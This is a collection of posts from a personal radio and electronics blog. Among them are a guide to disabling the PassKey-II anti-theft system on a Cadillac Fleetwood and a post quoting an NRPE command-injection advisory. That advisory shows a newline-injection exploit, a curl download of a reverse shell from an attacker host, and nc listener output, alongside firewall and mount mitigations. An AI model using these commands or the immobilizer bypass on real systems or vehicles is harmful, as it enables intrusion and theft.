Disable PassKey-II on Cadillac Fleetwood - Kirby's Musings

| No TrackBacks
I was recently introduced to a 94-96 Cadillac Fleetwood, which had a VATS fault which was aggravating the owner. The owner previously tried permanently installing resistors under the dash to allow the VATS system to read a correct resistance value, but for some reason that fix was no longer the cure.These are the steps taken the effectively neutralize the VATS/Passkey system on a 1995 Cadillac Fleetwood that was built in 08/1994 but had a 1995 VIN, and OBD-I. 1995 was the changeover year for the Fleetwood (D-body) to go from OBD-I to OBD-II, so depending on when the car was constructed, it may be of either type.

1) Use C.A.T.S. Flash to download the firmware from the car, twice to assure a proper read.
2) Disable VATS functionality from the car firmware.
3) Upload the firmware to the car.
4) Download the firmware from the car again to verify that the VATS function is disabled.

At this point in the process, the Powertrain Control Module (PCM) no longer monitors or acts on the signals from the Central Control Module (CCM) regarding fuel pump enable. Fuel Pump Enable is a "modulated signal wire", so tying the line to +5V or logic ground will not enable the pump. The service manual contains a simulated oscilloscope trace of a 50% duty cycle square wave. I did not take the time to verify the signal since it was outside of the scope of work (narrowly defined as "Bypass this b**** so I can get to work, homie!").

A core feature of the 1994/1995 LT1 corporate motor implementation present in the Chevy Camaro, Caprice, Impala SS, Buick Roadmaster, and Cadillac Fleetwood is that the fuel pump, injectors, and ignition coil are all under the control of the PCM, while the starter motor is controlled by the ignition switch alone. This means that it is possible to continue cranking the engine until the point of battery failure while the PCM has withheld spark, fuel, or both. Diagnostics of the system approaches ritualistic.

1) When the ignition switch is turned to ON, the fuel pump should run for a few seconds. Even if the fuel pump is weak, this is a good sign that fuel is present in the fuel rail and the PCM has an intent to start so far.
2) Battery voltage should remain above 8 V while cranking.
3) The PCM supplies both fuel (via injectors) and spark.
4) The spark plug gap is 0.050", and the ignition coil can deliver a healthy spark into almost anything -- including you. Use caution in verifying that sparks are being generated. A spare plug wire can connect to the top of the ignition coil and be held above ground to bypass the Optispark distributor.
5) Immediately after a cranking attempt without the engine firing, the odor of gasoline should be notable from the exhaust. Please remember not to smoke in an explosive environment such as unburned exhaust fumes.

The Cadillac Fleetwood further confounds this process because of two additional modules present in few cars. One of those modules is the Theft Deterrent Module (TDM), which receives key fob commands and responds, as well as controlling the horn and lights to create the panic alarm. This module is occasionally found in Buick Roadmasters and Chevy Impalas. Despite the name, the TDM has little to do with actually inhibiting the starting of the vehicle. The other module is the Central Control Module (CCM), which implements most of the functionality present in the Fleetwood's environmental, entertainment, and other systems present only in that car and not shared with many other cars of the model year. The CCM implements the actual checking of the PassKey-II resistor, and controls the Theft Deterrent Relay (TDR).

The Theft Deterrent Relay (TDR) is located on the cabin side of the firewall directly in front of the passenger seat under the dash. Gymnastics may be required to reach this area, so the TDR was left in factory configuration. The TDR is effectively in series with the starter solenoid, but only receives power when the ignition switch is set to START. The control wire for the TDR is Yellow/Black in the 1995 model year, and this wire color is present in the trunk at the CCM.

The Central Control Module (CCM) mounts vertically behind the middle of the backseat and has two connectors along the driver's side: C1 (upper), and C2 (lower). The wire that controls the TDR connects to position D13 of C2. D13 appears to be on the bottom of the connector, if the clamp is located on the top of the connector. The following should be observed as a guide:

D13: Yellow-Black
D14: Light Green
D16: Dark Green-White

Wire D13 can be cut and spliced to a wire connecting to a nearby bolt or self-tapping metal screw and star washer to the body of the car, which completes the ground circuit. This disables what little control the PassKey-II System has to prevent the car from cranking. It is worth noting that the PCM has most of the control of the cranking process, and if the TDR were bypassed (such as holding the starter solenoid down with a screwdriver), the car would likely start. A simple way to test if this change worked is to disconnect the CCM entirely, and attempt to start the car. If the starter solenoid or motor engages, the fix is effective. Then the CCM can be reconnected and the interior reinstalled in the trunk. 

Steel Wire Instead - Kirby's Musings

| No TrackBacks
In electrical applications, it's not unusual to spend a large amount of money acquiring and installing copper wire, or when that is too expensive, changing to a larger gauge or two and using aluminum wire. Sometimes the cost of aluminum wire is still significant, or there are special needs or reasons as to why steel wire may be favored, such as long spans. Long spans of unsupported wire are often seen in antenna applications as well as power distribution. These spans are typically above 125 feet in height, which is roughly the limit for timber which supplies wooden poles used to support such wires from the ground without impacting the antenna pattern.

From a historical text (free on Google Books, so likely well before 1950):

Example: A cable 3/8"-inch in diameter, made of 7 strands of high strength crucible steel, weighs approximately 295 lbs. per 1000 ft. and breaks under a load of 11,500 lbs. Calculate the actual cross sectional area from the fact that steels weights 490 lbs. per cubic foot; then find the resistance per mile, the ohms per circular mil foot being 115. The volume of 1000 ft. = 295/490 = 0.602 cu. ft., hence the cross section = 0.602/1000 = 0.000602 sq. ft. This equals 0.000602 x 144 or 0.0867 sq. in., which equals 86,700 sq. mils and 86,700 / 0.785, or 110,300 C. M. Resistance per mile = 115 x 5,280/110,300 = 5.5 ohms.

(Journal of Electricity, Jan 1, 1921, p. 30.) https://books.google.com/books?id=-uZBAQAAMAAJ&pg=PA30&lpg=PA30#v=onepage&q&f=false

3/8" is between 00 and 000 gauge, so one can see that this is still a large wire for any application used, and being larger than #6, satisfies NEC requirements for power distribution wire sizes.

#6: 0.162" or 13.3 mm diameter for solid rod wire.

Probably just cheaper to buy the cable with the insulation on it, unless it's going outdoors and that's a lot of insulation.

Grounding: Copper Strap vs Structural Steel - Kirby's Musings

| No TrackBacks
In broadcast, multi-tenant, and microwave shelter design, it is desirable to prevent lightning from impacting operations. One way of doing this is by constructing a "halo" around the inside of the building at roof, wall, and/or floor-level or around the outside of the shelter of entire equipment installation.

The fundamental nature of lightning is that of an effective DC pulse channeled through a single point of contact. Because lightning is essentially a large DC pulse like a square wave with a trailing edge, low-frequency AC pulses are induced in nearby wires and radiated when lightning strikes. This is what produces the characteristic "slope" on a spectrum analyzer of a lightning strike.

Since lightning is a static charge equalizing through a single point, it is easy to see that equalization over an area is the desired result of the strike. A tree gets blown to smithereens, but the charge dissipates and equalizes over the area around the strike -- both above and below the point of contact. Using good conductors, the magnitude of voltage across a given area is minimized. This lowered difference in potential prevents large voltages from appearing across equipment.

By running ground strap across the inside walls of the shelter around the perimeter at the ceiling, middle of wall, and floor levels, the lightning is given a path around the equipment instead of through the equipment. This prevents damage as high-resistance points in the equipment won't result in arc flashover due to high voltage across those points. This is not a Faraday cage, but works in a similar fashion. By giving lightning an alternative path of low resistance and impedance, the vast majority of the current goes around rather than through.

NEC compliance confuses this point, because traditional RF grounding for lightning and power grounding are somewhat at odds. Military manuals and Motorola's guide to R25 installation help. In some cases, the halo ground system has been implemented with the power ground opposite the tower coax window / ground panel. This allows NEC compliance with respect to the power ground, while putting a ground rod at the tower base and connecting the two together via 0000 to 2 AWG copper conductors.

At this point, we will discuss the merits of a copper ground halo above equipment versus using building steel and steel bolts.

A 4" copper ground strap 0.022" thick has a total cross section of 0.088 square inches, equating to a little larger than the cross-section of 0 AWG copper wire. 0 AWG copper wire has a resistance of 0.1 ohms per 1,000 ft. Thus, 1,000 feet of 4" 0.022" thick copper strap has a resistance of nearly 0.1 ohms.

A carbon steel wire 0.5" in diameter has a resistance of 0.00034 ohms per foot, or roughly .34 ohms per 1,000 ft. Thus, three 1/2" diameter bolts are nearly equal to 4" 0.022" thick copper strap assuming no other losses.

This calculation does not factor for the resistance of zinc at steel-zinc-zinc-steel junctions. However, one can see that steel-on-steel contact under pressure, three or more (typically six) bolts are enough to allow the building steel to act as a halo, thus not requiring a copper halo be installed as long as the building steel is attached to the ground system.

1" diameter carbon steel has a resistance of 9.0 x 10^-5 ohms per foot or .09 ohms per 1kft, so one can see why big towers often are not connected together with ground straps from section to section but smaller towers are.

It would be preferable to have the building steel sections welded together, or jumpers cadwelded around each joint.

Bell Microwave Radio Reference - Kirby's Musings

| No TrackBacks
This is an attempt at an exhaustive list of Bell System Technical Journal articles on Long Lines microwave technologies.

Published February 4, 1948
First introduction of the horn antenna and add/drop RF hybrid duplexer

BSTJ 30: 4. October 1951: The TD-2 Microwave Radio Relay System. (Roetken, A.A.; Smith, K.D.; Friis, R.W.)

BSTJ : The TJ Radio Relay System (Gammie, J.; Hathaway, S.D.)

Published July 4, 1960


BSTJ 39: 2. March 1960: Radio Frequency Interference Considerations in the TD-2 Radio Relay System. (Curtis, H.E.)

Published March 1960

BSTJ 62: 10. December 1983: The AR6A Single-Sideband Microwave Radio System: The Traveling-Wave-Tube Amplifier. (Balicki, J.F.; Cook, E.F.; Heidt, R.C.; Rutter, V.E.)


BSTJ 62: 1. January 1983: Maximum-Power and Amplitude-Equalizing Algorithms for Phase Control in Space Diversity Combining. (Karabinis, P.D.) Published January 1983

BSTJ 54: 1. January 1975: Space-Diversity Engineering. (Vigants, A.)

Published January 1975

BSTJ 44: 7. September 1965: The Triply-Folded Horn Reflector: A Compact Ground Station Antenna Design for Satellite Communiations. (Giger, A.J.; Turrin, R.H.)

Published September 1965

German microwave horn is based on this design. Musselhorn


BSTJ 42: 4. July 1963: The Autotrack System. (Cook, J.S.; Lowell, R.)

Published July 1963
Holmdel Horn tracker

BSTJ 42: 4. July 1963: The Servo System for Antenna Positioning. (Lozier, J.C.; Norton, J.A.; Iwama, M.)

Published July 1963

BSTJ 42: 4. July 1963: The Precision Tracker. (Anders, J.V.; Higgins, E.F. Jr.; Murray, J.L.; Schaefer, F.J. Jr.)

Published July 1963


BSTJ 42: 4. July 1963: Digital Equipment for the Antenna Pointing System. (Githens, J.A.; Peters, T.R.)

Published July 1963


BSTJ 38: 1. January 1959: Radio Transmission into Buildings at 35 and 150 mc. (Rice, L.P.)

Published January 1959


Published November 1952


BSTJ 38: 1. January 1959: Radio Attenuation at 11 kmc and Some Implications Affecting Relay System Engineering. (Hathaway, S.D.; Evans, H.W.)

Published January 1959

BSTJ 36: 3. May 1957: Interchannel Interference Due to Klystron Pulling. (Curtis, H.E.; Rice, S.O.)

Published May 1957

BSTJ 36: 2. March 1957: An Experimental Dual Polarization Antenna Feed for Three Radio Relay Bands. (Dawson, R.W.)

Published March 1957

BSTJ 47: 7. Septemember 1968: Microwave Radio Equipment and Building Considerations. (Skrabal, R.J.; Word, J.A.)

Published 1968-Septemember

BSTJ 38: 5. September 1959: A Network for Combining Radio Systems at 4, 6 and 11 kmc. (Harkless, Earl T.)

Published September 1959


Published November 1

BSTJ 50: 6. July-August 1971: Antenna Spacing Requirement for a Mobile Radio Base-Station Diversity. (Lee, W.C.Y. )

Published July 8, 1

BSTJ 60: 6. July-August 1981: Microwave Radio Obstruction Fading. (Vigants, A.)

Published July 8, 1

BSTJ 59: 8. Oct 1980: Horn-Reflector Antenna - Eliminating Weather-Cover Reflections. (Semplak, R.A.)

Published 1980-Oct

BSTJ 60: 8. October 1981: A New Approach to High-Capacity Digital Mobile Radio. (Henry, P.S.; Glance, B.S.)

Published October 1


BSTJ 45: 1. January 1966: The TM-1 / TL-2 Short Haul Microwave Systems. (Friis, R.W.; Jansen, J.J.; Jensen, R.M.; King, H.T.)

Published January 1966


BSTJ 50: 7. September 1971: TH-3 Microwave Radio System: Microwave Transmitter and Receiver . (Hamori, A.; Jensen, R.M.)

Published September 1


BSTJ 62: 10. December 1983: The AR6A Single-Sideband Microwave Radio System: Radio Transmitter-Receiver Units. (Heidt, R.C.; Cook, E.F.; Hecken, R.P.; Judkins, R.W.; Kiker, J.M. Jr.; Provenzano, F.J. Jr.; Wang, H.C.)

Published December 1983

BSTJ 37: 4. July 1958: Amplitude Modulation Suppression in FM Systems. (Ruthroff, C.L.)

Published July 1958

BSTJ 40: 1. January 1961: Mode-Conversion Filters. (Marcatili, E.A.)

Published January 1

BSTJ 50: 7. September 1971: TH-3 Microwave Radio System: Networks . (Drazy, E.J.; Sheehey, R.E.; Wang, H.C.)

Published September 1

BSTJ 47: 1. January 1968: An Improved Design of Waveguide Band-Rejection Filters. (Wang, H.C.)

Published January 1968

BSTJ 48: 2. February 1969: The Application of Delta Modulation to Analog-to-PCM Encoding. (Goodman, David J.)

Published February 1969


BSTJ 46: 1. January 1967: A High-Quality Waveguide Directional Filter. (Abele, T.A.)

Published January 1967

BSTJ 42: 5. September 1963: The TL Radio Relay System. (Hathaway, S.D.; Sagaser, D.D.; Word, J.A.)

Published September 1963


BSTJ 52: 5. May-June 1973: Computing Distortion in Analog FM Communication Systems. (Rainal, A.J.)

Published May 6, 1973


BSTJ 42: 4. July 1963: The Spacecraft Communications Repeater. (Davis, C.G.; Hutchison, P.T.; Witt, F.J.; Maunsell, H.I.)

Published July 1963


BSTJ 50: 7. September 1971: TH-3 Microwave Radio System: Modulators . (Giust, O.)

Published September 1

BSTJ 61: 8. October 1982: Error Probability of Partial-Response Continous-Phase Modulation withCoherent MSK-Type Receiver, Diversity, and Slow Rayleigh Fading in Gaussian Noise. (Sundberg, C.E.)

Published October 1982

BSTJ 40: 1. January 1961: Band-Splitting Filter. (Marcatili, E.A.; Bisbee, D.L.)

Published January 1

BSTJ 44: 4. April 1965: Index Reduction of FM Waves by Feedback and Power-Law Nonlinearities. (Benes, V.E.)

Published April 1965

BSTJ 50: 7. September 1971: TH-3 Microwave Radio System: Microwave Generator . (Bedell, H.R.; Judkins, R.W.; Lahlum, R.L.)

Published September 1

100 KHz Data Channels - Kirby's Musings

| No TrackBacks
In amateur radio we have 100 KHz wide data channels at a maxiumum of 19.2 kbaud (not kbit, kbaud indicates a symbol rate, not the actual data transferred or the binary serial data rate) at 222 MHz and above. However, very few radios actually support this data mode.

One approach to solve this problem is by using frequency-division multiplexing and inverse multiplexing. Inverse multiplexing separates a single high-speed serial data stream into a specific sequence of several slower serial data flows which pass over multiple data links of some form and are resequenced and combined at the opposite end of the link back into a high-speed data stream.

Using frequency-division multiplexing allows multiple voice channels to share a common group channel as if they were added up on the frequency axis. six 300 - 4,000 Hz voice channels are stacked to create a 300 - 24 KHz baseband voice group. That group when applied to an FM modulator with a modulation index of 1 in an occupied bandwidth of approximately 100KHz as calculated by Carson's Rule ( 24 KHz + 24 KHz = 48 KHz; 48 KHz * 2 = 96 KHz). (FCC Part 97 states that modulation index may not be greater than one.)

By splitting the resistive hybrid combiners from an external V.90 or V.92 modem (33.6 K or 56 K), the modem can be duplexed to use a four-wire interface with a separate TX and RX audio pair instead of a two-wire interface with both RX and TX combined. By capturing the independent audio streams using sound cards or DSP, the streams can be combined into four or just with simple processing. The incoming audio is captured at 8,000 samples per second with a 8-bit sample depth. The audio is mixed / stacked / combined using simple processor math or DSP, resulting in an audio stream that extends from 300 Hz to 24KHz. This is within the capabilities of 48KHz or 96 KHz sound cards, and there are USB varieties of each today. The resulting combined audio stream is applied directly to the modulator of a radio, creating the 100KHz wide modulated signal. To receive the signal, one need only remove the IF filters from the FM radio and replace the 20KHz filters with 100 KHz filters. The modulator may require specific modifications; some PLL loops operate at 50 KHz and may be incapable of handling the broad bandwidth.

The reason why 0-300 Hz is not used is to prevent issues with DC coupling in the modulator or demodulator. This also allows for introducing a low-frequency signaling component or clock synchronization carrier without introducing large amounts of AM, FM, and/or PM interference of any combination thereof.

The V.90 modem has a carrier frequency of 3429 Hz and runs at QAM256, encoding eight bits of information per resulting symbol. The V.90 and V.92 modem cores do not exist in an open-source format and contain related patents. Therefore, this is a circumstance where the modem function is effectively offloaded to dedicated hardware.

Combining the data flows from the six modems requires a form of inverse multiplexing. Rather than re-engineer and re-implement this in an format specific to this application, one may use Multilink PPP to effectively manage the modems and modem connectivity as well as perform frame disassembly and assembly.

Since digital switching is not involved, it is not possible to achieve 56 K or 64 K data rates. Instead, the maximum analog rate is the limit at 33.6 kbit/s per modem. This aggregates to 201.6 kbit/s, with one byte per modem being sent per symbol transmitted, (i.e.: 3429 * 6 = 20574 but the actual baud rate is 3429 Hz). Six bytes are transmitted per symbol time aggregated across all modems.

If one transmitter is located at 420.050 and another further up the band at 446.550 MHz, then duplexing may be possible without using cavity filters.

Why Analog Meters? - Kirby's Musings

| No TrackBacks
Why should I use analog meters?

  • Require no batteries
  • Can be left in circuit at all times
  • Instant or continuous reading/observation
  • Range can be set by configuration/specification/design

Analog meters may be used for a number of applications for measuring volts, amps, watts, ohms, etc. The biggest advantage is that one need not replace batteries to continue to observe electrical conditions.


In the case of voltmeters, one can protect the meter by using zener diodes. The range in a voltmeter is set by the coil resistance, as well as the multiplier or ballast resistor.

For ammeters, a pair of Schottky diodes wired back to back will protect the meter movement from large swings, with the hazard being that a 50 or 75 mV Full-Scale Deflection (FSD) meter movement may experience 300-400 mV as the diode starts to conduct, effectively acting like a zener diode.

  • Caveat: Ammeter shunts must be designed or rated for continuous-duty use to remain in circuit all the time. 
A standard shunt is only designed for 66% of the continuous-duty power dissipation requirements.  To maintain resistance rating, a larger shunt must be used that provides the same resistance over the desired range. One may calculate the range based on comparing 50mV shunts to 75 mV shunts and lining up the resistance to power ratings.

50mV is 66% of 75 mV; a 75A 75 mV shunt produces 50mV at 66% of the rated current (75A x 66% = 49.5A). Thus, a 75A 75mV intermittent-duty shunt is also  50mV 50A continuous-duty shunt (plus or minus a few percent).

To protect either in the case or situation of induced RF, liberal use of Schottky diodes and/or 10 - 1000 nF (0.01 uF, 0.1 uF, and 1 uF) capacitors will effectively short out the AC component.

A secondary caveat to using analog meters is that they are not known for accuracy; common meters were +/- 3% accurate, while high-accuracy meters were often +/- 1% accurate. Digital meters are far more accurate, but with accuracy come costs, and external power requirements.

IP Allocation Plan for AMPRNet Alabama - Kirby's Musings

| No TrackBacks
This is my plan for IP Allocation in for the Alabama section of AMPRNet:

V1.0: - /21 Backbone networking projects (statewide infrastructure, servers, DNS, DHCP, WWW, etc.) - 2x /24: /30s and /31s for fixed links on an individual coordination basis. - KK5VD (/28 actual for four links) - KK5VD - KK5VD - KK5VD - unallocated - individual allocations as necessary (/24s, etc. start here) Allocated N4BWP Allocated Madison County Area. /18 Statewide Mesh, OSLR, etc. Individual IPs defined per hostname or IP or request. Netmask:

V2.0: backbone services space
44.100.1-67/24: one /24 per county.
44.100.68-96: additional networks as needed, such as metro-area links
44.100.97-127: filled from the highest to lowest for point-to-point links, i.e.:
44.100.192-223/19: Mesh space - may be expanded to 44.100.128 and/or 44.100.255.

All of this keeps in mind that RF doesn't respect county boundaries, and there may be more than 252 people using IP in a given county.

Disable Auto-Play On Import in iTunes - Kirby's Musings

| No TrackBacks
From the "Who thought this was a good idea?" Dept.:

How to disable auto-play on import in iTunes:

Open a Terminal.App window and paste this in:

defaults write com.apple.iTunes play-songs-while-importing -bool FALSE

That's all.

AM Transmitter Efficiency Improvement - Kirby's Musings

| No TrackBacks
A carrier control system is sweeping AM radio stations now as AM stations rush to save power, Craig Kopcho says this on his experience:

This is a power saving gizmo that I installed in WOKV's night-time transmitter. It is set for a minus 3 dB dip in carrier and modulation power during periods of peak modulation. You can actually see the power drop with modulation. Now this goes against everything that I have been taught but I notice no degradation in coverage or loudness with the carrier control system working. The advantage of doing this is an overall reduction in power consumption. Again I have been where the signal is almost non-existing and remotely switched this system on and off and I cannot hear the difference. It should be noted that we have been granted permission from the FCC to not conform to traditional carrier shift requirements. The video was shot with the transmitter looking into the dummy load. https://www.youtube.com/watch?v=FARdE7_8bQM
Tom Ray corrects:

Your paragraph... ...is a little misleading. The power in the sidebands doesn't change from full carrier operation - so the modulation power is the same. It's the carrier that drops. And, be honest. When you put it on the air, and first saw the common point meter drop, you thought you had to fix something. That was my reaction.

"Everything old is new again," except there is nothing new here, save for the implementation. The technique originates in AM-compatible SSB and/or DSB with a suppressed carrier (DSB-SC). Dynamic Carrier Control has been around for a while, but real-time conversion from pure AM (even with DCC enabled) to DSB-SC is resulting in lowered power bills significantly (Tom Ray reported consistently measuring a 34% reduction in power consumption with a Harris 3DX50 transmitter, equating to about 23% savings for the entire site after including HVAC savings).

The short explanation of this phenomenon is that the carrier itself is being amplitude modulated prior to mixing or modulation when modulation is maximized. In this way, the implementation is more like AM times AM, or AM squared. It effectively behaves as if one placed a variable attenuator in the RF line and turned down the RF drive level as the modulation level approached maximum modulation. The drive level is returned to normal as the transmitter recovers from the modulation peak.

Historical AM transmitters, like WLW's 500kW station, requires large amounts of power to modulate the plate supply. The modulation power at audio frequencies is fed into a transformer installed between the DC power supply and the RF amplifier tubes and the resulting added or subtracted power effectively turns the carrier on and off on a continuously variable basis up to the limits of transformer core saturation, producing the modulation sidebands around the carrier as the constant carrier is modulated in amplitude by the combination of the two powers. As the transformer approaches saturation, it acts like a reactor or a variable choke, limiting the transfer of power to the final amplifier. This is how the 90-100% modulation is achieved; by pinching off the RF PA's power supply. Old fashioned, but it works.

The above technique is being rediscovered as the Class G amplifier, where the power supply bus rails and transistor biases are switched from several operating voltages, i.e.: -50, -25, -15, -7, -3.5 V and 3.5, 7, 15, 25, 50 V. The amplifier is kept operating as a Class-C amplifier at the different power levels and switched to the next range as more power is needed. Basically, a 150 W transistor (i.e.: 2N3055) is being used as a 100 mW (2N2222 or 2N3904 for the new kids), 1 W, 5 W, or 25W transistor when necessary.  

A two-way FM radio rated for 110W was sometimes rated by the manufacturer for 55W to 110W continuously variable -- that is, the power may be set to any level in that range and left there. The efficiency of the final (Class C) amplifier varies considerably through that range, and at power levels below 80%, may be less efficient than at higher power levels due to the fixed transistor bias levels. Those fixed bias levels cause the transistor to conduct longer at lower power levels, effectively reducing the "pulse like" behavior of a Class C amplifier -- conducting less than 50% of the time, approximately 120 degrees of the 360 degrees in a sine wave (33%) --  into a Class B amplifier, conducting 180 or less degrees (50%) and if bias is set high enough, into a Class AB amplifier, conducting 360 to 180 degrees of the cycle. Here I express conduction angle backwards, since we are moving from more efficient to less efficient as transistor bias voltage goes up and the transistor conducts more and more of the time it takes the sine wave to go through the cycle. That conduction time is being expressed in degrees of a 360 degree circle -- a sine wave may also be expressed as a circle, but that's calculus, vectors, and a whole lot of math.

What DSB-SC is doing is amplitude modulating the RF carrier drive to the final amplifier so that as peak modulation is approached, the RF drive is minimized. The resulting total peak power demand on the final amplifier goes down but the effective signal does not because the carrier is suppressed, reducing the amount of power required to amplify the combined lower and upper sidebands and the carrier.

From http://www.w8ji.com/amplitude_modulation.htm:

(If) Unmodulated carrier = 100 watts (PEP or) average carrier power.

Average is the same as PEP because, absent amplitude modulation, the carrier level is unchanging over time.

100% steady modulated 100 w carrier = 400 watts PEP or 150 watts average or "heating" power. Of this 150 watts average or "heating" power, 100 watts is in the carrier, and 25 watts average power is in each of the two AM signal's sidebands.

Carrier average power = 2/3 of the total 100% modulated average power

Total of both sidebands, average power = 1/3 of total average power under 100% modulation

Average power one sideband = 1/6th average power with 100% modulation

Peak Envelope Power 100% symmetrical modulation = Four times carrier power
As the carrier power is dynamically adjusted lower as modulation power increases, the total power required will flatten out, thus allowing an amplifier of a given size to effectively produce a signal as well as a conventional "pure AM" transmitter. One would think the CB radio guys would have figured this out a decade or two ago to get "more power" from a 4W AM or 12W SSB radio. DSB-SC, one would find the power level somewhere between those two numbers, but that's another story entirely.

NRPE Exploit and Solution - Kirby's Musings

| No TrackBacks
I don't often get on my soapbox, but this has gone on too long without resolution.

1. 4/20/2014, this was posted:


Recently, news emerged about a 'vulnerability' in Nagios's NRPE 'agent' - http://1337day.com/exploit/22156Essentially, you can use it to write files or items to /tmp (or any 'write all' directly ('777')) as below:

nagios@nagios-server:/usr/local/nagios/libexec# /usr/local/nagios/libexec/check_nrpe  -H myServer -c check_users -a "`echo -e "\x0a touch /tmp/vulntest "` #" 4
Then if you look on your 'monitored server', you'll see:

root@myServer:/proc# cd /tmp/
root@myServer:/tmp# ls -la
total 24
drwxrwxrwt 4 root root 4096 Apr 20 20:24 .
drwxr-xr-x 22 root root 4096 Apr 18 10:30 ..
-rw-r--r-- 1 nagios nagios 0 Apr 20 20:25 vulntest
This isnt best - as, has been seen, some pretty bad people can use this to put all kinds of bitcoin mining rubbish on there, amongst other things. Now, this only works because /tmp is writable to everyone (even on my test server, see below):

root@server:/# ls -la | grep tmp
drwxrwxrwt 4 root root 4096 Apr 20 20:24 tmp
So - answer number 1 - secure it! Now, if your savvy and use a config management tool like Puppet, Chef, Ansible etc then you can do this en-masse. For me, ive only got the one test server, so i just edited /etc/fstab:

/dev/sda7 /tmp ext3 nosuid,noexec,nodev,rw 0 0

This stops executables running from /tmp, neither any suid programs (more information here): http://www.techrepublic.com/blog/linux-and-open-source/secure-temporary-files-in-linux/171/#.Next step - answer number 2 - secure your boxes with a firewall. NRPE agents should ONLY be accessible from the Nagios monitoring server. The simplest way is to use iptables on the box:

iptables -I INPUT 2 -s -p tcp --dport 5666 -j ACCEPT
And reject NRPE from any other server. This means, only your Nagios server can access the box via 5666 - so, unless your monitoring server gets compromised - you should be in good shape.So - /tmp isnt writable, and no-one can run check_nrpe against the box except your monitoring server.Finally - look at SELinux if your using RHEL/Centos and the likes, and also look at this guide here: http://nagios.sourceforge.net/docs/3_0/security.htmlAt the end of the day, your network is only as secure as you make it - therefore i'd recommend a review of who can access your internal networks, HOW they got access (Firewalls, NAT, etc) and a review of your IPS/IDS if you are experiencing this issue.Also - this may be of interest in the future - check_by_ssh - http://www.techrepublic.com/blog/linux-and-open-source/remotely-monitor-servers-with-the-nagios-check-by-ssh-plugin/.We are currently looking at a patch for this issue in the coming days, so stay tuned to Twitter/Opsview forums for more on this issue.Sam MarshProduct ManagerOpsview

2. From http://1337day.com/exploit/22156
NRPE <= 2.15 - Remote Command Execution Vulnerability, 4/19/2014:

NRPE - Nagios Remote Plugin Executor  <= 2.15 Remote Command Execution
Nagios is an open source computer system monitoring, network monitoring and
infrastructure monitoring software application. Nagios offers monitoring and
alerting services for servers, switches, applications, and services.
It alerts the users when things go wrong and alerts them a second time when
the problem has been resolved.
The NRPE (Nagios Remote Plugin Executor) addon is designed to allow you to
execute Nagios plugins on remote Linux/Unix machines.
The main reason for doing this is to allow Nagios to monitor "local" resources
(like CPU load, memory usage, etc.) on remote machines. Since these public
resources are not usually exposed to external machines, an agent like NRPE must
be installed on the remote Linux/Unix machines.
Nagios Remote Plugin Executor (NRPE) contains a vulnerability that could
allow an attacker to remotely inject and execute arbitrary code on the host
under NRPE account (typically 'nagios').
The vulnerability is due to NRPE not properly sanitizing user input before
passing it to a command shell as a part of a configured command.
In order for an attacker to take advantage of the host NRPE must be compiled
and configured with command arguments.
No authentication is required to exploit this vulnerability if the NRPE port
has not been protected with a firewall.
NRPE expects definitions of commands in nrpe.cfg config file. Some of the
examples given in the config with hardcoded arguments are:
command[check_users]=/usr/local/nagios/libexec/check_users -w 5 -c 10
command[check_load]=/usr/local/nagios/libexec/check_load -w 15,10,5 -c 30,25,20
command[check_hda1]=/usr/local/nagios/libexec/check_disk -w 20% -c 10% -p /dev/hda1
when command arguments are enabled then user is also allowed to define
commands with variables like:
command[check_users]=/usr/local/nagios/libexec/check_users -w $ARG1$ -c $ARG2$
command[check_disk]=/usr/local/nagios/libexec/check_disk -w $ARG1$ -c $ARG2$ -p $ARG3$
This is often suggested for convenience in various nagios/nrpe setup tutorials
on the web.
To get a result from a defined command in NRPE daemon the following nrpe client
can be used with -a option that passes arguments:
# /usr/local/nagios/libexec/check_nrpe  -H -c check_users -a 4 4
USERS OK - 4 users currently logged in |users=4;4;4;0
in case check_users command was defined with arguments as shown above
NRPE would execute:
/usr/local/nagios/libexec/check_users -w 4 -c 4
on the local system.
As we can find in the source code of nrpe-2.15/src/nrpe.c NRPE daemon uses popen() function for
command execution:
/* executes a system command via popen(), but protects against timeouts */
int my_system(char *command,int timeout,int *early_timeout,char *output,int output_length){
                /* run the command */
using popen() results in the command being executed with the help of a command shell.
Before this function is reached however NRPE takes several measures to prevent
malicious command injection to the shell. That includes filtration based on a blacklist:
#define NASTY_METACHARS         "|`&><'\"\\[]{};"
/* make sure request doesn't contain nasties */
    syslog(LOG_ERR,"Error: Request contained illegal metachars!");
that prevents bash special characters like semicolon, pipe etc.
The code is also making sure that arguments do not contain bash command substitution
i.e. $(ps aux)
if(strstr(macro_argv[x],"$(")) {
    syslog(LOG_ERR,"Error: Request contained a bash command substitution!");
    return ERROR;
Despite these checks the code is vulnerable to command injection as bash shell allows
for multiple command execution if commands are separated by a new line.
None of the checks examines the arguments for an occurrence of a new line character: 0x0A
To execute an arbitrary command an attacker could simply add a new line character after
a parameter and follow it with his own command.
To run touch /tmp/vulntest command an attacker could use the check_nrpe client with arguments:
# /usr/local/nagios/libexec/check_nrpe  -H -c check_users -a "`echo -e "\x0a touch /tmp/vulntest "` #" 4
which make NRPE daemon run the following series of commands:
/usr/local/nagios/libexec/check_users -w <new_line>
touch /tmp/vulntest
# -c 4
and a file /tmp/vulntest would be created with nagios user as the owner. The hash character is to comment
out the the rest of the arguments.
An attacker gets a limited set of commands as most of the metacharacters are prohibited by the
blacklist. So for example it's difficult to create new files in the system without using > symbol etc.
An attacker could however download a snippet of perl/python etc. code from the web by using wget or
curl command and get a reverse shell. This would allow unrestricted access to the command line:
---------[revshell.pl on attackers-server]---------
use Socket;
#attackers ip to connect back to
    exec("/bin/sh -i");
/usr/local/nagios/libexec/check_nrpe  -H -c check_users -a "`echo -e "\x0a curl -o /tmp/tmp_revshell http://attackers-server/revshell.pl \x0a perl /tmp/tmp_revshell # "` 4 "
[attacker@ ]# nc -v -l 8080
Connection from port 8080 [tcp/ddi-tcp-1] accepted
sh-4.1$ id
uid=501(nagios) gid=501(nagios) groups=501(nagios),502(nagcmd)
sh-4.1$ cat /etc/passwd | head -n 4 ; pwd
sh-4.1$ ls -l /tmp/tmp_revshell
-rw-rw-r-- 1 nagios nagios 269 Apr 17 05:14 /tmp/tmp_revshell
sh-4.1$ rm -f /tmp/tmp_revshell
An attacker could exploit the vulnerability to gain access to the system
in the context of a nagios user this could lead to further compromise
of the server.
Current version of NRPE 2.15 and older are vulnerable.
Disable command arguments if possible.
Protect access to NRPE port and only allow access from a trusted
nagios server.
Install updated version of NRPE when it becomes available.

# F8888C01AE0BB66C   1337day.com [2014-07-24]   4F480D1B5D7C5F9D #
